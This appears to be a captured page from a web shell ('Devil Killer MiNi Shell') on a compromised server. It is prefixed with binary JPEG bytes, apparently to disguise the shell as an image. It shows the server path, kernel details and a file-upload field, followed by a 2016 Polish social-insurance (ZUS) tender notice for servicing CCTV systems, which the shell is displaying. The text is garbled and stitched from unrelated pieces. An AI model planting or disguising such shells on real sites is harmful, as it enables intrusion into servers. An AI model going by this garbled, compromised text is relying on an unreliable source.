JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160209/28480-N-2016.html

<p class="kh_header"><b>Biłgoraj: Usługa wykonywania serwisu (konserwacji, przeglądów i napraw) systemu telewizji przemysłowej w Oddziale ZUS w Kielcach i podległych jednostkach terenowych.</b><br>
<b>Numer ogłoszenia: 28480 - 2016; data zamieszczenia: 09.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Biłgoraju , ul. Kościuszki 103, 23-400 Biłgoraj, woj. lubelskie, tel. 84 6881212, 84 6881211, faks 84 6866974.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa wykonywania serwisu (konserwacji, przeglądów i napraw) systemu telewizji przemysłowej w Oddziale ZUS w Kielcach i podległych jednostkach terenowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usługi serwisu polegającego na wykonywaniu konserwacji i przeglądów (zwanych łącznie konserwacjami) oraz napraw systemu telewizji przemysłowej znajdującego się w Oddziale ZUS w Kielcach i jego podległych jednostkach terenowych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.71.10.00-2, 32.32.35.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawcy są zobowiązani przed upływem terminu składania ofert tj. 18.02.2016r.  godz. 9:00 do wniesienia wadium w wysokości 880 zł (słownie: osiemset osiemdziesiąt złotych 00/100);

2. Wadium może być wnoszone w jednej lub kilku formach określonych w art. 45 ust. 6 upzp. tj. w:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2014 poz. 1804 z późn. zm.).

3. Złożone wadium musi zabezpieczać ofertę w całym okresie związania tj. 30 dni od upływu terminu do składania ofert tj. od dnia 18.02.2016r. do dnia 18.03.2016r. 
4. W przypadku nie zabezpieczenia oferty dopuszczalną upzp formą wadium Zamawiający wykluczy Wykonawcę z postępowania. 
5. Wadium w formie pieniężnej zgodnie z art. 45 ust. 7 upzp Wykonawca wpłaca przelewem z rachunku bankowego na rachunek bankowy Zamawiającego. 
6. Dane dotyczące rachunku Zamawiającego na który należy wpłacić kwotę wymaganego wadium:
Nr rachunku: 58 1020  5590 0000 0902 9030 7014 
Dane banku: PKO BP Centrum Korporacyjne I w Warszawie, ul. Nowogrodzka 35/41
7. Na dyspozycji przelewu wymaganej kwoty wadium należy umieścić  informację o tym, że przelewana kwota to wadium dotyczące przedmiotowego przetargu. Informacja na dyspozycji przelewu może mieć następującą postać: 
WADIUM - PRZETARG KONSERWACJE PRZEGLĄDY I NAPRAWY SYSTEMU TELEWIZJI PRZEMYSŁOWEJ W O/ZUS W KIELCACH
8. Wadium wnoszone w formie pieniężnej winno zabezpieczać ofertę począwszy od upływu terminu składania ofert tzn. winno się znaleźć na koncie bankowym Zamawiającego najpóźniej o godz. 9:00 dnia 18.02.2016r. uwzględniając uwarunkowania bankowe (sesje) związane z przelewaniem kwot pieniężnych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje szczegółowo warunku poprzestając na oświadczeniu Wykonawcy, że go spełnia.

Ocena spełniania w/w warunku zostanie przeprowadzona metodą spełnia/nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 upzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony jeżeli Wykonawca:
1) złoży stosowne oświadczenie że spełnia w/w warunek,
2) wykaże, że wykonał (lub nadal wykonuje) należycie w okresie ostatnich  trzech lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę w zakresie konserwacji, przeglądów i napraw systemów telewizji przemysłowej z podaniem jej wartości, przedmiotu, dat wykonania i podmiotów na rzecz których wykazywana usługa została wykonana lub jest nadal wykonywana. Przedmiotem wykazywanej usługi w całości lub w części może być serwis techniczny gwarancyjny lub pogwarancyjny urządzeń systemu telewizji przemysłowej.

Wykonawca winien szczegółowo wykazać wymagany zakres wykonanych usług głównych wymaganych postawionym warunkiem.
Jedna usługa to jedna umowa, w ramach której wykonano lub nadal jest wykonywana usługa w zakresie konserwacji, przeglądów i napraw systemów telewizji przemysłowej odpowiadająca postawionemu  warunkowi.
Każda wykazywana usługa winna spełniać następujące wymagania:
a) okres realizowania co najmniej 12 miesięcy,
b) wartość usługi/umowy powinna wynosić co najmniej 8 000 zł brutto. 

Wykonawca może wykazać zgodnie ze swoim wyborem usługę wykonaną lub/i wykonywaną przy czym:
-pod pojęciem usługi wykonanej należy rozumieć usługę zrealizowaną (zakończoną),
-pod pojęciem usługi wykonywanej należy rozumieć usługę będącą w trakcie realizacji (usługę aktualnie wykonywaną), której wykonana część spełnia następujące wymagania:
okres realizacji -  co najmniej 12 miesięcy,
wartość już zrealizowana wynosi co najmniej 8 000 zł brutto,

Ocena spełniania w/w warunków zostanie przeprowadzona metodą spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 upzp oraz dokumentów określonych  w § 5 ust.1 pkt 1.1 siwz;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje szczegółowo warunku poprzestając na oświadczeniu Wykonawcy, że go spełnia.

Ocena spełniania w/w warunku zostanie przeprowadzona metodą spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 upzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje szczegółowo warunku poprzestając na oświadczeniu Wykonawcy, że go spełnia.

Ocena spełniania w/w warunku zostanie przeprowadzona metodą spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 upzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje szczegółowo warunku poprzestając na oświadczeniu Wykonawcy, że go spełnia.

Ocena spełniania w/w warunku zostanie przeprowadzona metodą spełnia / nie spełnia na podstawie złożonego przez Wykonawcę oświadczenia z art. 22 ust. 1 upzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz oferty wypełniony i podpisany wg wzoru określonego zał. nr 5 do siwz;
2) formularz cenowy wypełniony i podpisany wg wzoru określonego zał. nr 6 do siwz;
3) oświadczenie Wykonawcy o tym, że nie należy do grupy kapitałowej o której mowa w art. 24 ust. 2 pkt 5 upzp jeżeli zachodzi taka sytuacja. Wzór oświadczenia stanowi zał. nr 8 do siwz.  Wykonawca składa zamiennie albo listę o której mowa w sekcji III. 4.4) albo przedmiotowe oświadczenie; 
4) Pełnomocnictwo w przypadku gdy ofertę podpisuje, potwierdza za zgodność z oryginałem osoba inna niż wynika to z wpisu do KRS lub CEiDG. Pełnomocnictwo należy również załączyć w przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o zamówienie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Cena brutto 1 roboczogodziny w przypadku napraw - 6</li>
<li>3 - Czas naprawy w przypadku awarii - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Z zastrzeżeniem wynikającym z art. 144 ust. 1 upzp, wszelkie zmiany i uzupełnienia niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.
2. Zmiana umowy dokonana z naruszeniem przepisu art. 144 ust.1 upzp jest nieważna.   
3. Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w przypadku gdy konieczność wprowadzenia takich zmian wynika z okoliczności których nie można było przewidzieć w chwili zawarcia umowy tj. w szczególności:
1) Zmiany związane z przyczynami organizacyjnymi po stronie Odbiorcy:
a) pomniejszenie ilości serwisowanych instalacji i urządzeń w przypadku całkowitego wycofania z eksploatacji z adekwatnym pomniejszeniem wynagrodzenia w umowie z tytułu mniejszej ilości instalacji i urządzeń podlegających serwisowi. Zmiana ilości i kosztów podlegających przeglądom i konserwacjom instalacji i urządzeń w umowie następowałaby od przeglądu przed którym Odbiorca poinformował pisemnie Wykonawcę o zmniejszeniu ilości urządzeń podlegających przeglądom i konserwacjom oraz wskaże kwotę o którą zostanie pomniejszone wynagrodzenie, uwzględniającą powyższe zmiany,  
b) pomniejszenie ilości serwisowanych instalacji i urządzeń w przypadku częściowego wycofania z eksploatacji. W takim przypadku faktyczne wynagrodzenie z tytułu przeglądów i konserwacji w okresie przejściowego wycofania z eksploatacji określonych instalacji i urządzeń zostanie pomniejszone o nieeksploatowane instalacje i urządzenia. Zmiana ilości i kosztów podlegających przeglądom i konserwacjom instalacji i urządzeń w umowie następowałaby od przeglądu przed którym Odbiorca poinformował pisemnie Wykonawcę o zmniejszeniu ilości instalacji i urządzeń podlegających przeglądom i konserwacjom oraz wskaże kwotę o którą zostanie pomniejszone wynagrodzenie, uwzględniającą powyższe zmiany,   
c) pomniejszenie ilości serwisowanych instalacji i urządzeń w przypadku konieczności wykonania remontu kapitalnego lub modernizacji danej instalacji i urządzenia, które to czynności nie będą realizowane na podstawie niniejszej umowy. Instalacje i urządzenia które zostaną poddane kapitalnemu remontowi lub modernizacji zostaną wyłączone z serwisu w ramach niniejszej umowy na okres  udzielonej gwarancji na wykonany remont lub modernizację. Zmiana ilości i kosztów podlegających w tym zakresie przeglądów i konserwacji w umowie następowałaby od przeglądu przed którym Odbiorca poinformował pisemnie Wykonawcę o wyłączeniu określonych instalacji i urządzeń z eksploatacji w celu ich remontu lub modernizacji oraz wskaże kwotę o którą zostanie pomniejszone wynagrodzenie, uwzględniającą powyższe zmiany,
d) zmiana terminu płatności lub sposobu jego liczenia wynikająca z przyczyn leżących po stronie Odbiorcy,  
e) zmiana podwykonawcy ujawnionego w umowie na innego lub rezygnacja z podwykonawcy na rzecz samodzielnej realizacji umowy, 
f) wydłużenie przez Wykonawcę okresu gwarancji na wykonane naprawy lub części o dowolny okres,  
g) konieczność wprowadzenia zmiany, która jest korzystna dla Odbiorcy. Wprowadzenie takiej zmiany jest możliwe pod warunkiem, że gdyby hipotetycznie dokonać jej wprowadzenia przed terminem składania ofert nie miałoby to wpływu na krąg Wykonawców ani też na wybór oferty najkorzystniejszej. 
2) Zmiany wynikające ze zmiany przepisów prawa: 
a) wysokość wynagrodzenia Wykonawcy, o którym mowa w § 4 ust. 1, 2 i 5 może ulec zmianie z zastrzeżeniem postanowień lit. b) - e) w przypadku zmiany:
- stawki podatku od towarów i usług (VAT),
- wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. Nr 200, poz. 1679,  z późn. zm.),
- zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, 
jeżeli zmiany te będą miały wpływ na koszty wykonania przedmiotu umowy przez Wykonawcę.
b) w przypadku zmiany przepisów, o których mowa w lit. a), skutkujących zmianą wysokości wynagrodzenia należnego Wykonawcy, każda ze Stron umowy, w terminie od dnia opublikowania przepisów dokonujących tych zmian do 30 dnia od dnia ich wejścia w życie, może wystąpić do drugiej strony o dokonanie odpowiedniej zmiany wysokości wynagrodzenia,
c) podstawą do dokonania odpowiednich zmian wysokości wynagrodzenia, będzie przedstawiona każdorazowo Zamawiającemu i Odbiorcy kalkulacja kosztów Wykonawcy, potwierdzająca wpływ wejścia w życie przepisów dokonujących te zmiany na koszty wykonania przedmiotu umowy przez Wykonawcę. Wykonawca zobowiązany jest dostarczyć dokumentację potwierdzającą poprawność dokonanej kalkulacji wraz z dowodami uzasadniającymi zmianę wynagrodzenia,
d) przed podjęciem decyzji o zwiększeniu wynagrodzenia Zamawiający 
i Odbiorca dokona weryfikacji zasadności oraz poprawności obliczeń dokonanych przez Wykonawcę w zakresie żądanej zmiany wynagrodzenia, 
a także oceny możliwości sfinansowania wyższego wynagrodzenia w ramach środków posiadanych w planie finansowym Odbiorcy, zatwierdzonym na dany rok,
e) w przypadku stwierdzenia przez Odbiorcę braku możliwości zabezpieczenia środków finansowych na zwiększenie wynagrodzenia, Zamawiający dokona stosownego skrócenia okresu świadczenia usług, 
f) konieczność wprowadzenia innych zmian w umowie wynikająca z innych zmian bezwzględnie obowiązujących przepisów prawa, w oparciu, o które realizowana jest umowa, 
3) zmiana nr rachunku bankowego na który jest regulowane wynagrodzenie za wykonaną usługę;
4) zmiana okresu realizacji umowy tj. skrócenie terminu końcowego do którego miała być realizowana w wyniku wyczerpania maksymalnej wartości umowy, określonej w § 4 ust.1.
4. Nie stanowi zmiany umowy w szczególności:    
1) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (w szczególności zmiana danych teleadresowych);  
2) zmiana osób upoważnionych do koordynacji realizacji umowy o których mowa w § 10 ust. 5;
3) utrata mocy lub zmiana aktów prawnych przywołanych w treści umowy, do których stosować należy przepisy obowiązujące w danym czasie; 
4) zmiany osób, przy pomocy których Wykonawca realizuje przedmiot umowy z zastrzeżeniem, że posiadają wymagane uprawnienia i kwalifikacje wymagane umową i siwz o czym Wykonawca każdorazowo obowiązany jest informować Odbiorcę z wyprzedzeniem umożliwiającym realizację umowy. 
5. Zmiany, o których mowa w ust. 3 dokonywane są w drodze porozumienia Stron w formie aneksu do umowy za wyjątkiem ust. 3 pkt 1) lit. a) - c).
6. Zmiany, o których mowa w ust. 4 pkt 1), 2) i 4) oraz w ust. 3 pkt 1) lit. a)  - c) dokonywane są w drodze jednostronnego pisemnego oświadczenia Strony i wywołują skutek od dnia doręczenia go drugiej Stronie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych Oddział w Biłgoraju, Centrum Zamówień Publicznych, ul. Kościuszki 103, 23-400 Biłgoraj, tel.84 688 12 02, 84 688 12 12..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2016 godzina 09:00, miejsce: Zakład Ubezpieczeń Społecznych Oddział w Biłgoraju, Centrum Zamówień Publicznych ul. Kościuszki 103, 23-400 Biłgoraj, sala obsługi klienta stanowisko INFORMACJA OGÓLNA - dziennik podawczy..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




